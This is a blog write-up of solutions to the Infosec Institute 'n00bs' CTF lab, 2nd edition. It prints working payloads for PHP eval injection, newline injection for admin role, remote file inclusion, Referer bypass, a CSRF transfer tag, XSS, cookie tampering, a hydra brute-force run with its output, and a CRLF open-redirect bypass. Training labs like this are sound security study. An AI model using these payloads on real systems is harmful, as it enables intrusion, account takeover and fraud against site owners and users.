CTF, Wargame,

n00bs CTF Labs by Infosec Institute – 2nd edition

lvl7Captura

Here another edition of n00bs infosec CTF. 13 Levels, i will add as soon as i can complete, so stay tuned and keep visiting this post. Remember first edition ?.

Level 2

A simple calculator. Need to inject something that breaks the php code and prints something like phpinfo(). After several tries with operarands with no success i think about operator must not be set with any special ‘cast’ and simple put this string to pass the level.

;phpinfo();

So this string makes eval to lauch our phpinfo even is getting error too. I think operator variable was not sanitize at all. Maybe the solution to mitigate this attack could be a very basic code snipped like:

$operator = array("+", "-", "*", "/");
// If not in array, fail. 
if (!in_array($_GET['operator'], $operator)) {
    die('FAIL!');
}

lvl2Captura

Level 3

Hint says that we have to put a newline to get our role as admin. We inject after ‘lname’ parameter:

$ curl "http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php" -H "Cookie: PHPSESSID=0sik0or2grffh5uqibmildtp82" -H "Connection: keep-alive" --data "user=tunelk02&password=lalala&lname=any"%"0aadmin&email=t"%"40tt.com&register=Register"

What happened here is that the file that saves new users set automatic role as normal user and radsline by linea when login. If we put «lname=any%0aadmin» we force to register process to save as admin. And then just login.

lvl3Captura

 

 Level 4

Description says:

«You are confronted with a website that loads some .txt files to display content for its pages. You are thinking that it may be vulnerable. You aim to load a nice file from a remote server and share the link with unsuspecting visitors.
Your task is to successfully load a PHP file located in the root of infosecinstitute.com. The file should not exist but you must load it without getting errors and it must have the PHP file extension.»

So has to be just read instructions. Let’s test with http://infosecinstitute.com/file1.txt.php:

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=http://infosecinstitute.com/file1.txt.php

lvl42Captura

http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=HttP://infosecinstitute.com/file1.txt.php

Well it’s detected as URL. Reading hint (case-insensitive) we notice we can change some letters a little bit withou alter the mission.

Nice. Next one?.

lvl4Captura

Level 5

«It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in.»

If we focus on top of the page we see a disabled login button, something like this:

<a class="btn btn-sm btn-info" disabled="" href="login.html">login</a>

lvl5Captura

 

 

And if we try to get login.html access, is not found. Some of the levels, IMHO, have a very poor realistic implementation. Why they don’t put a real (but restricted login.html) that can be bypassed anyway?. Only need a check of the Referer header, a request like this:

$ curl -vvv http://ctf.infosecinstitute.com/ctf2/exercises/ex5.php -H "Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html"

Gosh, you were fast. You completed Level 5. You will be redirected to level 6 in 10 seconds.

Level 6

«It seems you have landed on a site that takes HTML tags for article’s comments. You want to exploit this by making the users perform an action on the bank.php file in the root of site.com, if they are logged in there. You want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter. Go ahead.»

Hey<img src="https://site.com/bank.php?transferTo=555">Visit

Enough and works on my server.

lvl6Captura

 Level 7

There are a hidden value here, injecting just ><h1>tunelko</h1>, we got:

lvl7_2

It seems  like PHP_SELF vulnerability, let’s close our quote.

 '><h1>tunelko</h1>

lvl7Captura

Level 11

Presented as another blacklisted part of the website and categorized as «Vulnerability: Bypassing blacklists«. A message appears on the webpage.

level11,sgCaptura

We just inspect cookies and see one of them called ‘welcome’ setted to no. Just change it to ‘yes’ to bypass the ‘restriction’:

$  curl -vvv "http://ctf.infosecinstitute.com/ctf2/exercises/ex11.php" -H "User-Agent: tnlk" -H "Cache-Control: no-cache" -H "Cookie: welcome=yes"|grep lead

Now you can see a different message.

You did it again! Why did they blacklist you anyway?

Level 12

We need to find password. Another bruteforce login.  On first edition they only give you a hint (cisco word) that guides you to try several combinations.  Now just google for the first dictionary with «filetype:lst password» query as search.

Ok, we get first position on first page an openwall common words. How to attack this time? We can beat it several ways: hydra, burp intruder, … As last time i did it with burp, let’s change to hydra this time. We download openwall dictionary on the same directory and start hydra tool with this parameters:

Host: ctf.infosecinstitute.com
Method: http-form-post 
Form action: "/ctf2/exercises/ex12.php:username=admin&amp;password=^PASS^&amp;logIn=Login:Incorrect username or password combination." 

login for admin with Password file downloaded before. 
-l admin -P password-2011.lst 

With 10 threads, wait for 30 and save output to log. 
-t 10 -w 30 -o log

* Notice post parameters inside and incorrect response for invalid users. 


 $ hydra ctf.infosecinstitute.com http-form-post "/ctf2/exercises/ex12.php:username=admin&amp;password=^PASS^&amp;logIn=Login:Incorrect username or password combination." -l admin -P password-2011.lst -t 10 -w 30 -o log

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-26 19:21:23
[DATA] max 10 tasks per 1 server, overall 64 tasks, 3546 login tries (l:1/p:3546), ~5 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: ctf.infosecinstitute.com   login: admin   password: princess
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-26 19:21:49

Ok, finished in few seconds. Login is admin and password is princess.

level12Captura

Level 13

Text on this level says …

«Hmm, it seems that level thirteen is redirecting to this page. Why do not you analyze the redirect and search if the redirect is validated thoroughly. If not, you want to redirect to a page on a remote server and send links to people fooling them to think they are accessing a different domain.»

If you see the menu link you can see a GET parameter redirect. This parameter is the key to succcessfully achieve that they are askin for: redirect to some page.

GET /ctf2/exercises/ex13.php?redirect=http://104.131.38.172/file.html HTTP/1.1

Not so fast … Seems they are filtering http protocol somehow, an ugly sentence inform us about it: Bad Redirect Parameter. 

What technique we could use to bypass it? First i have tried case-sensitive, but doesn’t work. Then i remember some old-tricky one  for servers that has this vulnerability. Http splitting is one of the one that can bypass the filter. It’s only a new line represented with hexadecimal values (%0a%0d) on GET request. As OWASP says on wikipage:

Exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages.

So we can try it:

http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=%0d%0a%20http://104.131.38.172/file.html

Now it works. Also we can put some other protocol on server we can manage and will work too.


More info: http://ctf.infosecinstitute.com/ctf2/

 

 

No hay contenido relacionado



1 comentario

0x00

julio 19, 2015

Level3 changed — this should work though:

curl -X POST http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php -H «Cookie: PHPSESSID=YOURSESSIONHERE» -H «Connection: keep-alive» –data «user=YOURUSER&password=password&lname=admin%0arole:admin&email=admin%40anywhere.com&register=Register»

0x00

Leave a Reply

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.